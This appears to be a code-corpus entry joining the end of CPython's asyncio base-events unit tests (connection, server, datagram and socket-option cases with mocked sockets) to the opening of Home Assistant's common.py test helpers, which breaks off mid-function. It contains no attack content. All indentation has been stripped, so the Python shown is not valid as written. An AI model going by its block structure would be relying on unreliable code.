return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'no socket.SOCK_NONBLOCK (linux only)')
def test_create_server_stream_bittype(self):
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
with sock:
coro = self.loop.create_server(lambda: None, sock=sock)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_datagram_endpoint_wrong_sock(self):
sock = socket.socket(socket.AF_INET)
with sock:
coro = self.loop.create_datagram_endpoint(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A UDP Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_connection_no_host_port_sock(self):
coro = self.loop.create_connection(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_no_getaddrinfo(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_connect_err(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(MyProto, 'example.com', 80)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_connection_multiple(self):
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
@patch_socket
def test_create_connection_multiple_errors_local_addr(self, m_socket):
def bind(addr):
if addr[0] == '0.0.0.1':
err = OSError('Err')
err.strerror = 'Err'
raise err
m_socket.socket.return_value.bind = bind
@asyncio.coroutine
def getaddrinfo(*args, **kw):
return [(2, 1, 6, '', ('0.0.0.1', 80)),
(2, 1, 6, '', ('0.0.0.2', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError('Err2')
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertTrue(str(cm.exception).startswith('Multiple exceptions: '))
self.assertTrue(m_socket.socket.return_value.close.called)
def _test_create_connection_ip_addr(self, m_socket, allow_inet_pton):
# Test the fallback code, even if this system has inet_pton.
if not allow_inet_pton:
del m_socket.inet_pton
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
coro = self.loop.create_connection(asyncio.Protocol, '1.2.3.4', 80)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('1.2.3.4', 80))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
sock.family = socket.AF_INET6
coro = self.loop.create_connection(asyncio.Protocol, '::1', 80)
t, p = self.loop.run_until_complete(coro)
try:
# Without inet_pton we use getaddrinfo, which transforms ('::1', 80)
# to ('::1', 80, 0, 0). The last 0s are flow info, scope id.
[address] = sock.connect.call_args[0]
host, port = address[:2]
self.assertRegex(host, r'::(0\.)*1')
self.assertEqual(port, 80)
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET6)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
@patch_socket
def test_create_connection_ip_addr(self, m_socket):
self._test_create_connection_ip_addr(m_socket, True)
@patch_socket
def test_create_connection_no_inet_pton(self, m_socket):
self._test_create_connection_ip_addr(m_socket, False)
@patch_socket
def test_create_connection_service_name(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
sock = m_socket.socket.return_value
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
self.loop._add_writer = mock.Mock()
self.loop._add_writer._is_coroutine = False
for service, port in ('http', 80), (b'http', 80):
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
t, p = self.loop.run_until_complete(coro)
try:
sock.connect.assert_called_with(('127.0.0.1', port))
_, kwargs = m_socket.socket.call_args
self.assertEqual(kwargs['family'], m_socket.AF_INET)
self.assertEqual(kwargs['type'], m_socket.SOCK_STREAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
for service in 'nonsense', b'nonsense':
coro = self.loop.create_connection(asyncio.Protocol,
'127.0.0.1', service)
with self.assertRaises(OSError):
self.loop.run_until_complete(coro)
def test_create_connection_no_local_addr(self):
@asyncio.coroutine
def getaddrinfo(host, *args, **kw):
if host == 'example.com':
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
else:
return []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(
MyProto, 'example.com', 80, family=socket.AF_INET,
local_addr=(None, 8080))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_connection_bluetooth(self, m_socket):
# See http://bugs.python.org/issue27136, fallback to getaddrinfo when
# we can't recognize an address is resolved, e.g. a Bluetooth address.
addr = ('00:01:02:03:04:05', 1)
def getaddrinfo(host, port, *args, **kw):
assert (host, port) == addr
return [(999, 1, 999, '', (addr, 1))]
m_socket.getaddrinfo = getaddrinfo
sock = m_socket.socket()
coro = self.loop.sock_connect(sock, addr)
self.loop.run_until_complete(coro)
def test_create_connection_ssl_server_hostname_default(self):
self.loop.getaddrinfo = mock.Mock()
def mock_getaddrinfo(*args, **kwds):
f = asyncio.Future(loop=self.loop)
f.set_result([(socket.AF_INET, socket.SOCK_STREAM,
socket.SOL_TCP, '', ('1.2.3.4', 80))])
return f
self.loop.getaddrinfo.side_effect = mock_getaddrinfo
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.return_value = ()
self.loop._make_ssl_transport = mock.Mock()
class _SelectorTransportMock:
_sock = None
def get_extra_info(self, key):
return mock.Mock()
def close(self):
self._sock.close()
def mock_make_ssl_transport(sock, protocol, sslcontext, waiter,
**kwds):
waiter.set_result(None)
transport = _SelectorTransportMock()
transport._sock = sock
return transport
self.loop._make_ssl_transport.side_effect = mock_make_ssl_transport
ANY = mock.ANY
# First try the default server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True)
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='python.org')
# Next try an explicit server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
server_hostname='perl.com')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(
ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='perl.com')
# Finally try an explicit empty server_hostname.
self.loop._make_ssl_transport.reset_mock()
coro = self.loop.create_connection(MyProto, 'python.org', 80, ssl=True,
server_hostname='')
transport, _ = self.loop.run_until_complete(coro)
transport.close()
self.loop._make_ssl_transport.assert_called_with(ANY, ANY, ANY, ANY,
server_side=False,
server_hostname='')
def test_create_connection_no_ssl_server_hostname_errors(self):
# When not using ssl, server_hostname must be None.
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, 'python.org', 80,
server_hostname='python.org')
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_ssl_server_hostname_errors(self):
# When using ssl, server_hostname may be None if host is non-empty.
coro = self.loop.create_connection(MyProto, '', 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
coro = self.loop.create_connection(MyProto, None, 80, ssl=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
sock = socket.socket()
coro = self.loop.create_connection(MyProto, None, None,
ssl=True, sock=sock)
self.addCleanup(sock.close)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_server_empty_host(self):
# if host is empty string use None instead
host = object()
@asyncio.coroutine
def getaddrinfo(*args, **kw):
nonlocal host
host = args[0]
yield from []
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
self.loop.getaddrinfo = getaddrinfo_task
fut = self.loop.create_server(MyProto, '', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertIsNone(host)
def test_create_server_host_port_sock(self):
fut = self.loop.create_server(
MyProto, '0.0.0.0', 0, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_host_port_sock(self):
fut = self.loop.create_server(MyProto)
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_server_no_getaddrinfo(self):
getaddrinfo = self.loop.getaddrinfo = mock.Mock()
getaddrinfo.return_value = []
f = self.loop.create_server(MyProto, 'python.org', 0)
self.assertRaises(OSError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_nosoreuseport(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY)
def test_call_coroutine(self):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_in_executor(None, func)
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
@asyncio.coroutine
def stop_loop_coro(loop):
yield from ()
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
@asyncio.coroutine
def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
if __name__ == '__main__':
unittest.main()
|
common.py | """Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
loop_stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
loop_stop_event.set()
orig_stop = hass.stop
hass._stopped = Mock(set=loop.stop)
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
loop_stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.data[loader.DATA_CUSTOM_COMPONENTS] = {}
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.media_dirs = {"local": get_test_config_dir("media")}
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
async def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode("utf-8")
msg = Message(topic, payload, qos, retain)
hass.data["mqtt"]._mqtt_handle_message(msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)})
for task in list(hass.loop._scheduled):
if not isinstance(task, asyncio.TimerHandle):
continue
if task.cancelled():
continue
mock_seconds_into_future = datetime_.timestamp() - time.time()
future_seconds = task.when() - hass.loop.time()
if fire_all or mock_seconds_into_future >= future_seconds:
with patch(
"homeassistant.helpers.event.time_tracker_utcnow",
return_value=date_util.as_utc(datetime_),
):
task._run()
task.cancel()
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(
EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info}
)
@ha.callback
def async_fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.async_fire(
